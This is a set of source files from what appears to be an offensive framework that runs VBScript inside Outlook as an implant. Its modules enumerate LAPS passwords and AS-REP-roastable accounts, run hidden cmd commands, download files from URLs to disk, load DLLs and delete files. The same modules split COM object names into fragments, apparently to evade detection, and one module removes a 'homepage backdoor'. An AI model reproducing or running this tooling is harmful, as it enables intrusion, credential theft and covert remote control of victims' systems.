C:\windows\system32\drivers\etc\hosts and outputs to the log. 11 | This might reveal specific hosts or other domains etc. 12 | 13 | It uses Scripting.FileSystemObject 14 | - OpenTextFile 15 | - OpenTextFile().ReadFile.ReadAll 16 | """ 17 | self.entry = 'list_hostsfile' 18 | self.depends = [] 19 | super().__init__(templatepath) 20 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_lapspassword.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates the LAPS passwords in the current domain. 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(\\root\\directory\\LDAP) 14 | - Query: SELECT DS_ms_Mcs_AdmPwd,DS_sAMAccountName,DS_ms_Mcs_AdmPwdExpirationTime FROM ds_computer Where DS_ms_Mcs_AdmPwd != NULL 15 | """ 16 | self.entry = 'list_lapspassword' 17 | self.depends = [] 18 | 19 | super().__init__(templatepath) 20 | -------------------------------------------------------------------------------- /functions/operation/network/netstat.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = r""" 9 | This module attempts to recreate netstat in vbscript. 10 | This will use the WMI class MSFT_NetTCPConnection to retrieve the info. 11 | 12 | It uses: 13 | WbemScripting.SWbemLocator 14 | ConnectServer(".", "root\StandardCimv2") 15 | SELECT FROM MSFT_NetTCPConnection 16 | """ 17 | self.entry = 'netstat' 18 | self.depends = [] 19 | self.options = {} 20 | super().__init__(templatepath) 21 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_services.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the services and status on the host. 10 | It lists out: 11 | - Service name 12 | - State (Stopped|Started) 13 | - Name (Name of the running account for the service) 14 | - BinPath 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - Query: Select * from Win32_Service 19 | """ 20 | self.entry = 'list_services' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/operation/file/list_shortcutinfo.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | Lists details about specified shortcut 9 | 10 | It uses WScript.Shell.CreateShortcut 11 | """ 12 | self.entry = 'list_shortcutinfo' 13 | self.depends = [] 14 | self.options['file'] = { 15 | "value": None, 16 | "required": True, 17 | "description": "Path to shortcut file you want to list info about", 18 | "handler": quotedstring 19 | } 20 | super().__init__(templatepath) 21 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_boottime.txt: -------------------------------------------------------------------------------- 1 | Function list_boottime() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select LastBootUpTime from Win32_OperatingSystem") 6 | 7 | For Each obj in col 8 | list_boottime = obj.LastBootUpTime 9 | Next 10 | list_boottime = ( Left(list_boottime, 4) _ 11 | & "/" & Mid(list_boottime, 5, 2) _ 12 | & "/" & Mid(list_boottime, 7, 2) _ 13 | & " " & Mid(list_boottime, 9, 2) _ 14 | & ":" & Mid(list_boottime,11, 2) _ 15 | & ":" & Mid(list_boottime,13, 2)) 16 | list_boottime = "Last Boot time: " & list_boottime 17 | End Function -------------------------------------------------------------------------------- /functions/operation/file/download_filehttp.txt: -------------------------------------------------------------------------------- 1 | Function download_filehttp() 2 | On error resume next 3 | Set oHTTP = window.external.OutlookApplication.CreateObject("MSX" & "ML2.ServerXM" & "LHTTP") 4 | oHTTP.open "GET", {{url}}, False 5 | oHTTP.send 6 | If oHTTP.Status = 200 Then 7 | Dim stream 8 | Set stream = window.external.OutlookApplication.CreateObject("ADO" & "DB.STR" & "EAM") 9 | With stream 10 | .Type = 1 11 | .Open 12 | .Write oHTTP.ResponseBody 13 | .SaveToFile {{destination}} 14 | .Close 15 | End With 16 | retval = "Agent Downloaded file: " & {{url}} & " to " & {{destination}} & " - Success" 17 | Else 18 | retval = "Agent Downloaded file: " & {{url}} & " to " & {{destination}} & " - Failed!" 19 | End If 20 | 21 | download_filehttp = retval 22 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_passwordpolicy.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates the password policy from the current domain. 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(\\root\\directory\\LDAP) 14 | - Query: SELECT DS_pwdProperties,DS_minPwdAge,DS_maxPwdAge,DS_minPwdLength,DS_lockoutThreshold,DS_lockoutDuration,DS_lockOutObservationWindow,DS_pwdHistoryLength FROM ds_domaindns 15 | """ 16 | self.entry = 'list_passwordpolicy' 17 | self.depends = [] 18 | 19 | super().__init__(templatepath) 20 | -------------------------------------------------------------------------------- /functions/operation/file/delete_file.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module deletes the specified file in the file option. 10 | 11 | It uses Scripting.FileSystemObject 12 | - DeleteFile 13 | - FileExists 14 | """ 15 | self.entry = 'delete_file' 16 | self.depends = [] 17 | self.options['file'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path to file to delete", 21 | "handler": quotedstring 22 | } 23 | super().__init__(templatepath) 24 | -------------------------------------------------------------------------------- /functions/operation/network/netstat.txt: -------------------------------------------------------------------------------- 1 | function netstat() 2 | on error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\StandardCimv2") 5 | 6 | Set colNetstat = objWMIService.ExecQuery("SELECT LocalAddress, RemoteAddress, RemotePort FROM MSFT_NetTCPConnection WHERE State = 5 AND RemoteAddress <> '127.0.0.1' AND RemoteAddress <> '::1' AND RemotePort < 49152") 7 | 8 | If colNetstat.Count = 0 Then 9 | netstat = "No active TCP connections found." 10 | Else 11 | For Each conn In colNetstat 12 | netstat = netstat & "Local: " & conn.LocalAddress & " | Remote: " & conn.RemoteAddress & ":" & conn.RemotePort & vbCrLf 13 | Next 14 | End If 15 | end function -------------------------------------------------------------------------------- /functions/operation/file/check_filehash.txt: -------------------------------------------------------------------------------- 1 | Function check_filehash() 2 | On Error Resume Next 3 | set oMD5 = window.external.OutlookApplication.CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider") 4 | Set oStream = window.external.OutlookApplication.CreateObject("ADODB.Stream") 5 | oStream.Type = 1 'adTypeBinary 6 | oStream.Open 7 | oStream.LoadFromFile {{file}} 8 | CompleteFile = oStream.Read 9 | oStream.Close 10 | Set oStream = Nothing 11 | 12 | oMD5.ComputeHash_2(CompleteFile) 13 | Set oXml = CreateObject("MSXML2.DOMDocument") 14 | Set oElement = oXml.CreateElement("tmp") 15 | oElement.DataType = "bin.hex" 16 | oElement.NodeTypedValue = oMD5.Hash 17 | check_filehash = "MD5 hash of file " & {{file}} & " is " & oElement.Text 18 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_applocker.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the status of AppLocker. 10 | It returns one of the following statuses: 11 | - Not Enabled 12 | - Auditing 13 | - Enforced 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - ConnectServer(root\cimv2).EnumKey 18 | - ConnectServer(root\cimv2).GetDwordValue 19 | - ConnectServer(root\cimv2).GetStringValue 20 | 21 | """ 22 | self.entry = 'list_applocker' 23 | self.depends = [] 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_logging.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates status of logging on the host. 10 | It figures out status on logging settings for: 11 | - ProcessCreationIncludeCmdLine 12 | - PowerShell Script Block Logging 13 | - PowerShell Transcript Logging 14 | 15 | It uses WbemScripting.SWbemLocator 16 | - ConnectServer(root\cimv2) 17 | - ConnectServer(root\cimv2).EnumKey 18 | - ConnectServer(root\cimv2).GetDWORDValue 19 | """ 20 | self.entry = 'list_logging' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/operation/file/check_fileexist.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module checks if specified file in the file option exists or not. 10 | 11 | It uses Scripting.FileSystemObject 12 | - FileExists 13 | """ 14 | self.entry = 'check_fileexist' 15 | self.depends = [] 16 | self.options['file'] = { 17 | "value": None, 18 | "required": True, 19 | "description": "path to file you want to check exists", 20 | "handler": quotedstring 21 | } 22 | super().__init__(templatepath) 23 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_windowsversion.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the Current Windows version on the host. 10 | It retrieves data from HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion and lists out: 11 | - ProductName 12 | - ReleaseId 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer 16 | - ConnectServer(root\cimv2).GetStringValue 17 | """ 18 | self.entry = 'list_windowsversion' 19 | self.depends = [] 20 | super().__init__(templatepath) 21 | 22 | def rethandler(self, agent, options, data): 23 | agent.windowsversion = data -------------------------------------------------------------------------------- /functions/execute/host/cmd.txt: -------------------------------------------------------------------------------- 1 | Function Execute_CMD() 2 | On Error Resume Next 3 | 4 | Const HIDDEN_WINDOW = 0 5 | Set ws = window.external.OutlookApplication.CreateObject("Wscr" & "ipt.s" & "hell") 6 | Set f = window.external.OutlookApplication.CreateObject("Scri" & "pting.FileSyst" & "emObject") 7 | tmp = f.GetSpecialFolder(2) 8 | fn = f.GetTempName 9 | ff = tmp & "\" & fn 10 | c = "cmd /c " & {{command}} & " > " & ff 11 | 12 | ws.Run c, 0, true 13 | if f.FileExists(ff) then 14 | set tf = f.OpenTextFile(ff) 15 | if not tf.atendofstream then 16 | retval = tf.ReadAll 17 | tf.close() 18 | Execute_CMD = "Command executed: " & c & vbCrLf & retval 19 | else 20 | tf.close() 21 | Execute_CMD = "Command: " & c & " returned no data" 22 | end if 23 | f.DeleteFile ff 24 | end if 25 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_passwordnotrequired.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates all users from Active Directory that has the --Does not require password-- set. 11 | It returns the sAMAccountName, ADSIPath and the useraccountcontrol value 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(\\root\\directory\\LDAP) 15 | - Query: SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 32 16 | """ 17 | self.entry = 'list_passwordnotrequired' 18 | self.depends = [] 19 | super().__init__(templatepath) -------------------------------------------------------------------------------- /lib/validators/files.py: -------------------------------------------------------------------------------- 1 | import traceback 2 | import os 3 | 4 | def isreadable(path, **kwargs): 5 | errmsg = None 6 | try: 7 | if path.lower() == "none": 8 | return True 9 | ret = os.access(path, os.R_OK) 10 | if ret == False: 11 | print("Could not read specified file") 12 | return ret 13 | except Exception as msg: 14 | traceback.print_exc() 15 | print('Exception checking path') 16 | return False 17 | 18 | def isbasename(path, **kwargs): 19 | try: 20 | if '\\' in path: 21 | print("Path given should be basename only, do not use a full path") 22 | return False 23 | else: 24 | return True 25 | except Exception as msg: 26 | traceback.print_exc() 27 | print('Exception checking path') 28 | return False 29 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_asreproast.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates all users from Active Directory that has the --Do Not Require Kerberos Pre-authentication-- set. 11 | It returns the sAMAccountName, ADSIPath and the useraccountcontrol value 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(\\root\\directory\\LDAP) 15 | - Query: SELECT DS_userAccountControl,DS_samaccountname FROM ds_user Where DS_userAccountControl >= 4194304 16 | """ 17 | self.entry = 'list_asreproast' 18 | self.depends = [] 19 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/trolling/set_clipboard.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module allows you to specify text as input and it will add it to the clipboard 10 | 11 | It uses htmlfile 12 | - ParentWindow.ClipboardData.SetData() 13 | 14 | """ 15 | self.entry = 'set_clipboard' 16 | self.depends = [] 17 | 18 | self.options['clipboardtext'] = { 19 | "value": None, 20 | "required": True, 21 | "description": "Text you want to add to the clipboard", 22 | "handler": quotedstring 23 | } 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/operation/outlook/list_overview.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | This module lists the structure inside outlook to 3 levels deep. Showing folders and number of items inside. 9 | * Deleted Items - items: 45 10 | ** RSS - items: 0 11 | * Inbox - items: 10 12 | ** TestFolder - items: 1 13 | ** test2 - items: 0 14 | *** level3 - items: 5 15 | * Outbox - items: 0 16 | * Sent Items - items: 2 17 | * Archive - items: 7 18 | 19 | It uses OutlookApplication 20 | - GetNameSpace("MAPI").Folders() 21 | """ 22 | self.entry = 'list_overview' 23 | super().__init__(templatepath) 24 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_timezone.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | from lib.core.specmodule import SpecModule 4 | 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | Finds the name of the current timezone for the agent 12 | 13 | It uses WbemScripting.SWbemNamedValueSet 14 | - Add.__ProviderArchitecture 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - ConnectServer(root\cimv2) 18 | - ConnectServer(root\cimv2).GetStringValue 19 | """ 20 | self.entry = 'list_timezone' 21 | self.depends = [] 22 | super().__init__(templatepath) 23 | 24 | def rethandler(self, agent, options, data): 25 | agent.timezone = data -------------------------------------------------------------------------------- /functions/enumerate/host/list_windowsarch.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the Windows Architecture on the host. 10 | This module writes the result to agent in the database. 11 | Arch value is found under: 12 | HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment - PROCESSOR_ARCHITECTURE. 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer 16 | - ConnectServer(root\cimv2).GetStringValue 17 | """ 18 | self.entry = 'list_windowsarch' 19 | self.depends = [] 20 | super().__init__(templatepath) 21 | 22 | def rethandler(self, agent, options, data): 23 | agent.windowsarch = data -------------------------------------------------------------------------------- /functions/operation/file/check_filearch.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module checks if specified file in the file option exists or not. 10 | 11 | It uses ADODB.Stream 12 | - Open 13 | - LoadFromFile 14 | - Position 15 | - Read 16 | - Close 17 | """ 18 | self.entry = 'check_filearch' 19 | self.depends = [] 20 | self.options['file'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "path to file you want to check exists", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) 27 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_processes.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates running processes on the host. 10 | It lists out: 11 | - PID 12 | - PPID 13 | - Arch based on virtual size (x86 set to less than 4094967296 Bytes, could be FP here) - Double check using operation-file-check_filearch 14 | - Process Name 15 | - Executable Path 16 | 17 | It uses WbemScripting.SWbemLocator 18 | - ConnectServer(root\cimv2) 19 | - Query: Select Name,ProcessId,ParentProcessId,VirtualSize,ExecutablePath from Win32_Process 20 | """ 21 | self.entry = 'list_processes' 22 | self.depends = [] 23 | super().__init__(templatepath) 24 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_basic.txt: -------------------------------------------------------------------------------- 1 | Function list_basic() 2 | On error resume next 3 | Set sh = window.external.OutlookApplication.CreateObject("Wsc" & "ript.Sh" & "ell") 4 | 5 | gds = sh.ExpandEnvironmentStrings("%COMPUTERNAME%") 6 | huj = sh.ExpandEnvironmentStrings("%USERNAME%") 7 | imd = sh.ExpandEnvironmentStrings("%USERDOMAIN%") 8 | fvy = sh.ExpandEnvironmentStrings("%USERPROFILE%") 9 | udd = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%") 10 | fah = sh.ExpandEnvironmentStrings("%LOGONSERVER%") 11 | hyf = sh.ExpandEnvironmentStrings("%HOMEPATH%") 12 | 13 | If udd = "%USERDNSDOMAIN%" Then 14 | udd = "WORKGROUP" 15 | End If 16 | 17 | list_basic = "UserName: " & huj & vbCrLf & "ComputerName: " & gds & vbCrLf & "UserDomain: " & imd & vbCrLF & "UserDNSDomain: " & udd & vbCrLF & "Logon server: " & fah & vbCrLF & "Homepath: " & hyf & vbCrLF & "UserProfile: " & fvy & vbCrLF & vbCrLf 18 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_officearch.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the installed Office Architecture on the host. 10 | This module writes the result to agent in the database. 11 | It retrieves the bitness from the Path value under 12 | HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\outlook.exe. 13 | 14 | It uses WbemScripting.SWbemLocator 15 | - ConnectServer(root\cimv2) 16 | - ConnectServer(root\cimv2).GetStringValue 17 | """ 18 | self.entry = 'list_officearch' 19 | self.depends = [] 20 | super().__init__(templatepath) 21 | 22 | def rethandler(self, agent, options, data): 23 | agent.officearch = data -------------------------------------------------------------------------------- /functions/enumerate/host/list_installedapps.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the installed applications. 10 | It enumerates information from the 11 | HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ 12 | & 13 | HKLM\\SOFTWARE\\wow6432node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ 14 | registry keys. 15 | 16 | It uses WbemScripting.SWbemLocator 17 | - Add 18 | - ConnectServer(root\cimv2) 19 | - ConnectServer(root\cimv2).EnumKey 20 | - ConnectServer(root\cimv2).GetStringValue 21 | """ 22 | self.entry = 'list_installedapps' 23 | self.depends = [] 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_ntdomaininfo.txt: -------------------------------------------------------------------------------- 1 | Function list_ntdomaininfo() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set colNTDomain = objWMIService.ExecQuery("Select * from Win32_NTDomain") 6 | 7 | For Each domain in colNTDomain 8 | For Each domAttribute in domain.Properties_ 9 | if Not (IsNull(domAttribute.value) OR IsEmpty(domAttribute.value)) Then 10 | if IsArray(domAttribute) then 11 | ntinfo = ntinfo & domAttribute.Name & ": " & Join(domAttribute, ", ") & vbCrLf 12 | else 13 | ntinfo = ntinfo & domAttribute.Name & ": " & domAttribute.value & vbCrLf 14 | end if 15 | end if 16 | Next 17 | Next 18 | list_ntdomaininfo = ntinfo 19 | End Function -------------------------------------------------------------------------------- /functions/api/load_dll.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | Loads a dll from disk using LoadLibrary 9 | """ 10 | self.entry = 'load_dll' 11 | self.depends = [] 12 | self.options['dll'] = { 13 | "value": None, 14 | "required": True, 15 | "description": "dll to load", 16 | "handler": None 17 | } 18 | super().__init__(templatepath) 19 | 20 | def preprocess(self, agent): 21 | if agent.api_verified != True: 22 | raise RuntimeError("API has not been verified, please run api_verify first to check that the API is working\nIf it works it will mark the attribute api_verified to True\nTo override you would need to use dbedit to change the value to true") 23 | -------------------------------------------------------------------------------- /functions/operation/file/list_acl.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module lists the ACL for the specified file or folder in the Path option. 10 | 11 | It uses WbemScripting.SWbemLocator: 12 | - Query: Select * from win32_logicalFileSecuritySetting WHERE Path= 13 | -- GetSecurityDescriptor 14 | """ 15 | self.entry = 'list_acl' 16 | self.depends = [] 17 | self.options['path'] = { 18 | "value": None, 19 | "required": True, 20 | "description": "Path to file or folder you want to see ACL's for", 21 | "handler": quotedstring 22 | } 23 | super().__init__(templatepath) 24 | -------------------------------------------------------------------------------- /functions/operation/outlook/list_overview.txt: -------------------------------------------------------------------------------- 1 | Function list_overview() 2 | on error resume next 3 | Set folder = window.external.OutlookApplication.GetNameSpace("MAPI") 4 | set subfolders = folder.Folders(1).Folders 5 | for i = 1 To subfolders.count 6 | output = output & "| " & subfolders(i) & " (" & subfolders(i).items.Count & ")" & vbCrLf 7 | if subfolders(i).folders.count <> 0 then 8 | for ii = 1 To subfolders(i).folders.count 9 | output = output & "-> " & subfolders(i).folders(ii) & " (" & subfolders(i).folders(ii).items.count & ")" & vbCrLf 10 | if subfolders(i).folders(ii).folders.count <> 0 then 11 | for iii = 1 To subfolders(i).folders(ii).folders.count 12 | output = output & "--> " & subfolders(i).folders(ii).folders(iii) & " (" & subfolders(i).folders(ii).folders(iii).items.count & ")" & vbCrLf 13 | next 14 | end if 15 | next 16 | end if 17 | next 18 | list_overview = output 19 | End Function -------------------------------------------------------------------------------- /functions/execute/host/wscriptshell.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | This module executes command defined in the command option through the wscript com object. 11 | The executed file will become a sub-process under outlook.exe. 12 | Normally NOT OPSEC SAFE 13 | 14 | It uses Wscript.shell 15 | - run 16 | """ 17 | self.entry = 'Execute_WscriptShell' 18 | self.depends = [] 19 | self.options['command'] = { 20 | "value": None, 21 | "required": True, 22 | "description": "command to execute via wscript com object", 23 | "handler": quotedstring 24 | } 25 | super().__init__(templatepath) 26 | -------------------------------------------------------------------------------- /functions/api/run_shell.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | Run a basic shell command via the installed com object 9 | """ 10 | self.entry = 'run_shell_api' 11 | self.depends = [] 12 | self.options['cmd'] = { 13 | "value": None, 14 | "required": True, 15 | "description": "Command to execute", 16 | "handler": None 17 | } 18 | super().__init__(templatepath) 19 | 20 | def preprocess(self, agent): 21 | if agent.api_verified != True: 22 | raise RuntimeError("API has not been verified, please run api_verify first to check that the API is working\nIf it works it will mark the attribute api_verified to True\nTo override you would need to use dbedit to change the value to true") 23 | -------------------------------------------------------------------------------- /functions/execute/host/remove_homepage.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Removes the homepage implant in a nice way :-). 10 | This should be used when you want to remove the homepage backdoor on a host. 11 | It removes the URL registry key as well as the EnableRoamingFolderHomepages. 12 | 13 | It uses WbemScripting.SWbemNamedValueSet 14 | - Add.__ProviderArchitecture 15 | - Add.__RequiredArchitecture 16 | 17 | It uses WbemScripting.SWbemLocator 18 | - ConnectServer(root\cimv2) 19 | - ConnectServer(root\cimv2).GetStringValue 20 | - ConnectServer(root\cimv2).DeleteValue 21 | """ 22 | self.entry = 'remove_homepage' 23 | self.depends = [] 24 | super().__init__(templatepath) 25 | -------------------------------------------------------------------------------- /functions/operation/file/delete_dir.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module will delete specified directory and all contents (all files and subfolders). 10 | Specify folder path without trailing \\ 11 | 12 | It uses Scripting.FileSystemObject 13 | - DeleteFolder 14 | - FolderExists 15 | """ 16 | self.entry = 'delete_dir' 17 | self.depends = [] 18 | self.options['directory'] = { 19 | "value": None, 20 | "required": True, 21 | "description": "Path to directory that should be deleted. i.e. c:\\parent\\random_secret_folder", 22 | "handler": quotedstring 23 | } 24 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/host/list_networkcardinfo.txt: -------------------------------------------------------------------------------- 1 | Function list_networkcardinfo() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "\root\cimv2") 5 | Set colNicConfigs = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration",,48) 6 | 7 | For Each NIC in colNicConfigs 8 | For Each nicAttribute in NIC.Properties_ 9 | if Not (IsNull(nicAttribute.value) OR IsEmpty(nicAttribute.value)) Then 10 | if IsArray(nicAttribute) then 11 | nicResponse = nicResponse & nicAttribute.Name & ": " & Join(nicAttribute, ", ") & vbCrLf 12 | else 13 | nicResponse = nicResponse & nicAttribute.Name & ": " & nicAttribute.value & vbCrLf 14 | end if 15 | end if 16 | Next 17 | Next 18 | list_networkcardinfo = nicResponse 19 | End Function -------------------------------------------------------------------------------- /functions/operation/file/create_dir.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module creates the directory structure (recursive) 10 | specified in the directory option. 11 | 12 | It uses Scripting.FileSystemObject 13 | - GetAbsolutePathName 14 | - BuildPath 15 | - FolderExists 16 | - CreateFolder 17 | """ 18 | self.entry = 'create_dir' 19 | self.depends = ['./helperFunctions/dir_creator.txt'] 20 | self.options['directory'] = { 21 | "value": None, 22 | "required": True, 23 | "description": "Directory to create. i.e. c:\\parent\\child", 24 | "handler": quotedstring 25 | } 26 | super().__init__(templatepath) 27 | 